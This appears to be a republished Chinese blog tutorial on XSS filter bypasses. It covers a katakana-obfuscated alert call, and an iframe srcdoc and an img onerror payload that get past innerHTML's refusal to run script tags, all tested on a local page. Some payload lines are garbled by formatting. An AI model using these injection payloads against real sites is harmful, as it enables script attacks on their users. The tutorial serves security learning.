专栏首页小白帽学习之路小生归一(六)xss特殊绕过

小生归一(六)xss特殊绕过

此文章为原创连载文章,关注公众号,持续更新。

原python与安全系列作者文续

1.特殊alert

([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,

ナ]=[!!ウ]+!ウ+ウ.ウ)[ア+=ウ+ナ+ヘ+ネ+ホ+ヌ+

ア+ネ+ウ+ホ][ア](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()

学习来源:

(https://github.com/aemkei/katakana.js/blob/master/annotated.js)

此处本来应有表情包~(懒得放了)

2.绕过innerHTML插入无法执行

在HTML5中不会执行由innerHTML插入的script标签

1、通过iframe的srcdoc

本地搭建如下:

<html>
<body>
<h1>TESTONE</h1>
</body>
<script>
var test=document.location.hash.substr(1);
document.body.innerHTML=unescape(test);
</script>
</html>

下面访问不能执行alert:

alert(1);" _href="http://localhost/#alert(1);">http://localhost/#<script>alert(1);</script>

下面访问可以执行alert:

http://localhost/#<iframesrcdoc="<script>alert(1);</script>"></iframe>

2、使用其他标签代替script

继续使用前面的环境测试:

http://localhost/#"<imgsrc='x' onerror='alert(1)'>"

除了script标签意外其它差不多都可以。

本文分享自微信公众号 - 程序员阿甘(gh_a2e36d69d566),作者:小生归一

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • XSS相关Payload及Bypass的备忘录(上)

    跨站脚本攻击(XSS)是一种计算机安全漏洞,通常出现在Web应用程序中。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时...

    7089bAt@PowerLi
  • ​安全服务之安全基线及加固(五)IIS篇

    这次的内容接之前中间件方面的加固,分享一下IIS加固的笔记。就以手里的IIS6.0为例了。

    7089bAt@PowerLi
  • 国内外网络安全现状与存在的问题

    随着人工智能、大数据、5G等新兴技术的发展,企业面临的威胁日益增加。相关数据显示,在2015年至2025这十年间,网络攻击引发的全球潜在经济损失可能高达2940...

    7089bAt@PowerLi
  • xBIM 基础10 WeXplorer 浏览器检查

      在上一篇 《xBIM基础 09 WeXplorer 基本应用》 已经提到,查看器不会在所有浏览器的所有设备上运行。为了操作效率和简单,决定使用最新技术 。浏...

    张传宁老师
  • Java小议蛇形矩阵

    描述: 蛇形矩阵是由1开始的自然数依次排列成的一个矩阵上三角形。 输入正整数n(n不大于100)输出,输出一个n行n列的蛇形矩阵。例如5行5列蛇形矩阵输出为:

    老九学堂-小师弟
  • 5G与GIS的未来展望(PPT+讲稿)上篇

    本文是2020年ArcGIS开发者大会,6月17日上午主题大会第四场,虾神关于5G与GIS未来之路的演讲讲稿,放出的文字版。

    气象学家
  • JavaScript 函数

    JavaScript解析过程分为两个阶段,先是编译阶段,然后执行阶段,在编译阶段会将function定义的函数提前,并且将var定义的变量声明提前,将它赋值为u...

    Devops海洋的渔夫
  • 基于 Go 语言开发在线论坛(六):日志和错误处理

    到现在为止,我们已经完成了在线论坛项目基本功能的开发,相信你已经对 Go 语言 Web 编程中如何实现 MVC 架构模式以及 CRUD(数据库增删改查)基本操作...

    学院君
  • Bootstrap笔记

    Bootstrap简介什么是Bootstrap?框架:库 lib libraryjQuery作为一个框架来讲,提供一套比较便捷的操作DOM的方式把大家都需要的功...

    用户1212940
  • 2015-2018机器人操作系统(ROS)及其应用暑期学校资料汇总 ROS Summer School 持续更新

    2018年ROS暑期学校报名链接:http://www.huodongxing.com/go/ros2018

    zhangrelay

扫码关注云+社区

领取腾讯云代金券